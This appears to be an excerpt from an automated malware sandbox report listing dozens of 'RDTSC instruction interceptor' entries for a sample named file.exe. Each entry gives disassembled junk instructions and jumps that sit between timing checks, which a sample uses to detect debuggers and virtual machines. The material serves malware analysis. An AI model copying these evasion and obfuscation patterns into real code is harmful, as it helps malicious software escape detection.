              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D491F second address: 13D495E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop esi 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 popad 0x00000011 jl 00007F76D8B73128h 0x00000017 jng 00007F76D8B730FEh 0x0000001d pushad 0x0000001e popad 0x0000001f jp 00007F76D8B730F6h 0x00000025 push eax 0x00000026 push edx 0x00000027 jp 00007F76D8B730F6h 0x0000002d jmp 00007F76D8B73102h 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4AF8 second address: 13D4B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4B03 second address: 13D4B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4B09 second address: 13D4B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4C6B second address: 13D4C7B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4C7B second address: 13D4C81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4C81 second address: 13D4C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c je 00007F76D8B730F6h 0x00000012 pop ebx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jbe 00007F76D8B730F6h 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4C9E second address: 13D4CA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4CA4 second address: 13D4CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4CA8 second address: 13D4CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4E81 second address: 13D4E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4E85 second address: 13D4E8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4E8C second address: 13D4E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D5841 second address: 13D585C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F76D9315E66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D585C second address: 13D5864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D5AEC second address: 13D5AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D5AF0 second address: 13D5B00 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jo 00007F76D8B730F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D5B00 second address: 13D5B10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D9315E5Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D5B10 second address: 13D5B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CC0C4 second address: 13CC0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB239 second address: 13AB23D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB23D second address: 13AB24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F76D9315E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D5CAD second address: 13D5CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D66A6 second address: 13D66B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F76D9315E62h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D66B4 second address: 13D66BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D694B second address: 13D6951 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6951 second address: 13D695D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D695D second address: 13D6975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F76D9315E61h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6975 second address: 13D697F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D697F second address: 13D6989 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F76D9315E56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA369 second address: 13DA36F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA36F second address: 13DA373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DB2FB second address: 13DB2FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DB2FF second address: 13DB31D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9315E67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC45D second address: 13DC461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1D33 second address: 13E1D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1D3C second address: 13E1D43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1D43 second address: 13E1D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1D4E second address: 13E1D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F76D8B730F6h 0x0000000c popad 0x0000000d jc 00007F76D8B73102h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1D63 second address: 13E1D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F76D8DA98C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1D71 second address: 13E1D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1600 second address: 13E163D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8DA98D7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F76D8DA98E0h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E163D second address: 13E1666 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76D8B79F28h 0x00000008 jmp 00007F76D8B79F33h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 jp 00007F76D8B79F26h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E190E second address: 13E1916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E50E7 second address: 13E50F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8CF8FDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E50F8 second address: 13E50FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E51F5 second address: 13E5207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp+04h], eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F76D8CF8FD8h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5772 second address: 13E5778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5778 second address: 13E5781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5A38 second address: 13E5A3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5A3C second address: 13E5A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F76D8CF8FDCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5A4A second address: 13E5A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F76D881F856h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5A5A second address: 13E5A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5A60 second address: 13E5A84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D881F867h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5A84 second address: 13E5A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5A89 second address: 13E5A93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F76D881F856h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5B87 second address: 13E5B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5B8E second address: 13E5B98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F76D881F856h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5B98 second address: 13E5B9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5B9C second address: 13E5BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F76D881F858h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 jnp 00007F76D881F85Ch 0x00000029 lea eax, dword ptr [ebp+12478685h] 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 push ebx 0x00000033 jmp 00007F76D881F85Ch 0x00000038 pop ebx 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5BE8 second address: 13E5C0D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76D8CF8FDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F76D8CF8FE2h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5C0D second address: 13CCB63 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F76D881F858h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F76D881F858h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 call dword ptr [ebp+122D202Ah] 0x0000002d push ebx 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 push esi 0x00000032 pop esi 0x00000033 pop edx 0x00000034 jmp 00007F76D881F860h 0x00000039 pop ebx 0x0000003a jo 00007F76D881F876h 0x00000040 jng 00007F76D881F85Ch 0x00000046 je 00007F76D881F856h 0x0000004c push eax 0x0000004d push edx 0x0000004e ja 00007F76D881F856h 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CCB63 second address: 13CCB69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419004 second address: 141902D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F76D881F85Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F76D881F85Ah 0x00000011 push ecx 0x00000012 push edx 0x00000013 pop edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop ecx 0x00000017 popad 0x00000018 pushad 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141902D second address: 1419033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419033 second address: 141903D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14192E6 second address: 14192EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14192EE second address: 14192F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14192F4 second address: 141930F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F76D8CF8FE3h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14194B8 second address: 14194BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14194BC second address: 14194C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141963A second address: 141963F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141963F second address: 1419661 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8CF8FE8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F76D8CF8FD6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419661 second address: 1419665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419665 second address: 1419671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419A84 second address: 1419AB2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edi 0x0000000e js 00007F76D881F858h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F76D881F866h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141CABD second address: 141CAEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8CF8FE9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F76D8CF8FDBh 0x0000000e jnp 00007F76D8CF8FD6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1421556 second address: 1421568 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F76D881F856h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1421568 second address: 142156E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142156E second address: 142158B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D881F869h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142158B second address: 142158F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420A8A second address: 1420AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D881F861h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007F76D881F863h 0x00000011 push esi 0x00000012 jmp 00007F76D881F85Eh 0x00000017 pop esi 0x00000018 popad 0x00000019 pushad 0x0000001a push edi 0x0000001b push esi 0x0000001c pop esi 0x0000001d pushad 0x0000001e popad 0x0000001f pop edi 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420AD2 second address: 1420ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1421875 second address: 142187A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142187A second address: 142189B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8CF8FE0h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F76D8CF8FDEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142189B second address: 14218A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1421B51 second address: 1421B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14263F4 second address: 14263F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14263F8 second address: 14263FE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14263FE second address: 142641A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F76D881F85Eh 0x0000000c ja 00007F76D881F862h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142641A second address: 1426420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14265DE second address: 14265E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14266E3 second address: 14266E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14266E7 second address: 14266EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142688B second address: 14268A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D570ECh 0x00000007 jp 00007F76D8D570E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14268A1 second address: 14268A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14268A6 second address: 14268BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8D570EAh 0x00000009 jno 00007F76D8D570E6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
